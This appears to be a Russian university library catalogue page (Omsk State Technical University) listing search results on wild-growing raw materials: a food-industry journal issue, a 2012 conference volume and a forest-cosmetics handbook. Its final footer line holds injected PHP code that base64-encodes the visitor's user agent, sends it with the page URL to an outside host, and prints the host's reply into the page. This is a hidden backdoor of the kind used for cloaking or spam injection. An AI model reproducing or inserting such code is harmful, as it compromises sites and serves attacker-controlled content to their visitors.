Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

111 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ДИКОРАСТУЩЕЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 3
1. 
Пищевая промышленность. - Журнал, 2007г. № 11
Оглавление 
  • Никифорова, Т. А. Перспективные пищевые добавки для производства высококачественной продукции / Т. А. Никифорова. - с.8-9
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Егорова, Е. Ю. Продукты функционального назначения и БАД к пище на основе дикорастущего сырья / Е. Ю. Егорова. - с.12-14
    Кл. слова: БАД, СЫРЬЕ ДИКОРАСТУЩЕЕ
  • Еремина, О. Ю. Использование натуральных наполнителей при производстве мороженого / О. Ю. Еремина, Т. Н. Иванова. - с.24-25
    Кл. слова: МОРОЖЕНОЕ - ПРОИЗВОДСТВО
  • Кисиль, Н. Н. Лизин - незаменимая добавка в пищу / Н. Н. Кисиль, Э. М. Тер-Саркисян. - с.30
    Кл. слова: ЛИЗИН, ДОБАВКА ПИЩЕВАЯ
  • Имамович, Д. Рынок замороженных полуфабрикатов / Д. Имамович. - с.38-39
    Кл. слова: ПОЛУФАБРИКАТ ЗАМОРОЖЕННЫЙ
  • Хануров, Э. Р. Развитие рынка винодельческой продукции России / Э. Р. Хануров. - с.40
    Кл. слова: РЫНОК ВИНА, ВИНОДЕЛИЕ - Россия
  • Минкин, М. Л. / М. Л. Минкин. - с.Технология производства белковых продуктов от компании "АЛЬФА ЛАВАЛЬ"
    Кл. слова: ПРОДУКТ БЕЛКОВЫЙ
  • Драчева, Л. В. Гибкая упаковка - фаворит на рынке упаковочных материалов / Л. В. Драчева. - с.68-69
    Кл. слова: УПАКОВКА ГИБКАЯ
  • Золотин, А. Ю. Методология системного анализа производства продуктов детского питания / А. Ю. Золотин. - с.71
    Кл. слова: ПИТАНИЕ ДЕТЕЙ
Держатели документа (Информация об экземплярах) 
2. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 2 [Текст] / ред. А. И. Барановский, 2012. - 187 с.
Ключевые слова 
Оглавление 
  • Заблицева, М. А. Характеристика овощного сырья, используемого в производстве йогуртов / М. А. Заблицева, И. А. Долматова. - с.4-8
    Кл. слова: ЙОГУРТ
  • Завгородняя, Л. М. Разработка и оптимизация рецептуры молочного десерта для школьного питания / Л. М. Завгородняя. - с.8-9
    Кл. слова: ДЕСЕРТ МОЛОЧНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Загидуллин, Д. З. Влияние материала оборудования на окисление аскорбиновой кислоты / Д. З. Загидуллин, В. Ю. Кирсанов, Ф. Ф. Фазлыев. - с.9-12
    Кл. слова: ОКИСЛЕНИЕ, КИСЛОТА АСКОРБИНОВАЯ
  • Иванова, Л. П. Спорт и здоровье: функциональный продукты специального назначения / Л. П. Иванова, Л. В. Егорова, С. В. Чехунов. - с.13-18
    Кл. слова: СПОРТ - ЗДОРОВЬЕ
  • Ивкова, И. Д. Использование растительных жиров в современных пищевых производствах / И. Д. Ивкова, А. С. Пиляева. - с.18-21
    Кл. слова: ПРОИЗВОДСТВО ПИЩЕВОЕ, ЖИР РАСТИТЕЛЬНЫЙ
  • Ивченко, В. В. Сравнительная характеристика качества кофе натурального растворимого разных производителей / В. В. Ивченко, О. В. Бессонова. - с.22-24
    Кл. слова: КОФЕ
  • Калауденова, А. Т. Изучение потребительских предпочтений и экспертиза качества оливкого масла / А. Т. Калауденова. - с.25-32
    Кл. слова: МАСЛО ОЛИВКОВОЕ
  • Кирсанов, В. Ю. Изучение влияния УФ-излучения на микрофлору предприятий общественного питания на примере дрожжей SACCHAROMYCES CEREVISIAE / В. Ю. Кирсанов, С. Е. Шаталов, Д. З. Загидуллин. - с.32-34
    Кл. слова: УФ - ИЗЛУЧЕНИЯ, МИКРОФЛОРА, ДРОЖЖИ
  • Ковальчук, О. Г. Соблюдение водного режима в марафонском беге / О. Г. Ковальчук, П. А. Скрипников. - с.34-38
    Кл. слова: БЕГ МАРАФОНСКИЙ, РЕЖИМ ПИТЬЕВОЙ, ПИТЬЁ СПОРТИВНОЕ
  • Колчина, В. А. Обогащение творога фруктовыми наполнителями / В. А. Колчина, И. А. Долматова, Т. Н. Зайцева. - с.38-42
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, ТВОРОГ
  • Кольман, О. Я. Инновационные технологии производства мучных кондитерских изделий, обогащенных ягодным порошком / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.42-45
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Кольман, О. Я. Современные индустриальные технологии в производстве кондитерских изделий на ягодной основе / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.46-49
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Корнева, О. С. Статистический анализ стабильности производства пива / О. С. Корнева. - с.49-53
    Кл. слова: ПИВО - ПРОИЗВОДСТВО
  • Корнева, О. С. Управление качеством пива на стадии формирования рынка / О. С. Корнева. - с.54-57
    Кл. слова: ПИВО
  • Коротаева, Т. А. Возможность использования фиников в производстве мучных кондитерских изделий / Т. А. Коротаева. - с.57-58
    Кл. слова: ФИНИКИ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Костюченко, Н. В. Влияние электромагнитной обработки на микроорганизмы / Н. В. Костюченко. - с.59-61
    Кл. слова: ОБРАБОТКА ЭЛЕКТРОМАГНИТНАЯ, МИКРООРГАНИЗМЫ
  • Костенко, Л. Н. Исследование качества чая черного байхового различных производителей / Л. Н. Костенко, О. В. Бессонова. - с.62-64
    Кл. слова: ЧАЙ
  • Кошкин, П. Ю. Перспективы использования пенообразных масс в молочной промышленности / П. Ю. Кошкин. - с.64-67
    Кл. слова: МАССА ПЕНООБРАЗНАЯ, ПРОМЫШЛЕННОСТЬ МОЛОЧНАЯ
  • Крылова, Л. В. Рекомендации в питании спортсменам-любителям / Л. В. Крылова, В. Н. Понкратов. - с.67-70
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Методика оценки сбалансированности белкового состава многокомпонентных продуктов для школьного питания / ; П. А. Лисин, [и др.]. - с.70-77
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Проектирование поликомпонентных пищевых продуктов с заданным составом и свойствами / ; П. А. Лисин, [и др.]. - с.77-85
    Кл. слова: ПРОДУКТЫ ПИЩЕВЫЕ ПОЛИКОМПОНЕНТНЫЕ
  • Локотченко, Н. С. Проблемы и перспективы разработки низколактозных молочных коктейлей и пенообразующими свойствами / Н. С. Локотченко. - с.85-88
    Кл. слова: КОКТЕЙЛЬ МОЛОЧНЫЙ
  • Лопатинская, Т. В. Продукты питания функционального назначения для детей дошкольного возраста / Т. В. Лопатинская, Д. А. Чистякова, О. Я. Соколова. - с.89-92
    Кл. слова: ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лузан, В. Н. Проектирование продукта на основе рыбного сырья нутриентно-адекватного питанию детей дошкольного возраста / В. Н. Лузан, Л. А. Ключникова, Б. Ш. Цыренжапов. - с.92-99
    Кл. слова: РЫБА - ПИТАНИЕ, ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лукьянюк, Н. В. Современные индустриальные технологии пищевых продуктов / Н. В. Лукьянюк. - с.99-102
    Кл. слова: ЧАЙ
  • Малкова, Н. К. Расширение ассортимента мучных кондитерских изделий повышенной пищевой ценности для сетевого питания / Н. К. Малкова, Л. Г. Ермош. - с.102-105
    Кл. слова: АССОРТИМЕНТ КОНДИТЕРСКИХ ИЗДЕЛИЙ
  • Мусифуллина, Э. В. Яблочные чипсы сублимационной сушки / Э. В. Мусифуллина, Н. В. Макарова, А. Н. Дмитриева. - с.105-109
    Кл. слова: ЧИПСЫ ЯБЛОЧНЫЕ, СУШКА СУБЛИМАЦИОННАЯ
  • Никифорова, Л. М. Заменители мяса, используемые для получения новых видов мясных продуктов / Л. М. Никифорова, О. В. Бессонова. - с.109-112
    Кл. слова: ЗАМЕНИТЕЛЬ МЯСА
  • Паленков, И. А. Разработка системы управления безопасностью и качеством слабоалкогольной газированной продукции / И. А. Паленков, О. В. Пасько. - с.112-120
    Кл. слова: АЛКОГОЛЬ, ПРОДУКЦИЯ СЛАБОАЛЬКОГОЛЬНАЯ
  • Петрова, Е. И. Перспектива расширения ассортимента молочных продуктов для питания спортсменов / Е. И. Петрова. - с.121-124
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Портнягина, В. А. Производство функциональных продуктов для геродиетического питания / В. А. Портнягина. - с.124-126
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Пушмина, И. Н. Формирование подходов к разработке функциональных молокосодержащих продуктов с использованием природных цеолитов / И. Н. Пушмина, А. В. Бауэр. - с.127-128
    Кл. слова: ЦЕОЛИТ ПРИРОДНЫЙ, ПРОДУКЦИЯ МОЛОКОСОДЕРЖАЩАЯ
  • Романишина, Е. Р. Исследование показателей качества и безопасности мясосодержаших полуфабрикатов / Е. Р. Романишина. - с.129-134
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСНЫЕ
  • Савинцева, Ю. О. Современные индустриальные технологии пищевых продуктов на ОАО "Омская макаронная фабрика" / Ю. О. Савинцева. - с.134-141
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, ФАБРИКА МАКАРОННАЯ
  • Сапожников, А. Н. Влияние обработки пшеничной муки энергией инфракрасного излучения на сохраняемость хлеба / А. Н. Сапожников, Л. П. Шорникова, С. К. Волончук. - с.141-145
    Кл. слова: МУКА ПШЕНИЧНАЯ, ХЛЕБ
  • Смирнова, Н. А. Разработка стандарта организации "Биопродукт творожный" / Н. А. Смирнова. - с.146-149
    Кл. слова: БИОПРОДУКТ ТВОРОЖНЫЙ
  • Струпан, Е. А. Технология продуктов переработки дикорастущего сырья / Е. А. Струпан, В. С. Колодязная, О. А. Струпан. - с.149-155
    Кл. слова: СЫРЬЕ ДИКОРАСТУЩЕЕ
  • Трофимов, И. Е. Продукты на основе натурального – основа питания спортсмена / И. Е. Трофимов. - с.156-157
    Кл. слова: СЫРЬЕ НАТУРАЛЬНОЕ, ПИТАНИЕ СПОРТСМЕНОВ
  • Троценко, В. В. Повреждение семян зерновых культур при послеуборочной обработке / В. В. Троценко, А. И. Забудский. - с.158-162
    Кл. слова: ЗЕРНО, ГРЕЧИХА
  • Турлубаева, А. Н. Экология и пища / А. Н. Турлубаева, О. Я. Соколова. - с.162-165
    Кл. слова: ПИЩА - ЭКОЛОГИЯ
  • Унжакова, К. С. Медико-биологические аспекты создания продукции геродиетического питания / К. С. Унжакова, М. В. Исаева, О. Я. Соколова. - с.165-168
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Четвертаков, А. А. Расширение ассортимента продукции за счет использования нетрадиционных видов йодосодержащего растительного сырья / А. А. Четвертаков, Г. В. Иванова, С. В. Чехунов. - с.168-171
    Кл. слова: СЫРЬЕ РАСТИТЕЛЬНОЕ ЙОДОСОДЕРЖАЩЕЕ, АССОРТИМЕНТ ПРОДУКЦИИ
  • Чехомова, Е. А. Товароведная оценка сладко-сливочного масла "Крестьянское" / Е. А. Чехомова, И. А. Ивкова. - с.172-174
    Кл. слова: МАСЛО КОРОВЬЕ
  • Щербина, М. О. Сравнительная характеристика качества варенья различных производителей / М. О. Щербина, Е. П. Галкова. - с.175-177
    Кл. слова: ВАРЕНЬЕ
  • Ходырева, Е. И. Проблемы формирования кластеров общественного питания / Е. И. Ходырева. - с.178-184
    Кл. слова: КЛАСТЕР, ПИТАНИЕ ОБЩЕСТВЕННОЕ
Держатели документа (Информация об экземплярах) 
3. 
Молодожникова, Людмила Михайловна. Лесная косметика [Текст] : справ. пособие / Л. М. Молодожникова, О. С. Рождественская, В. Ф. Сотник, 1992. - 333, [3] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2999 - 26.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.63 с.14 запросов, 0.52c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;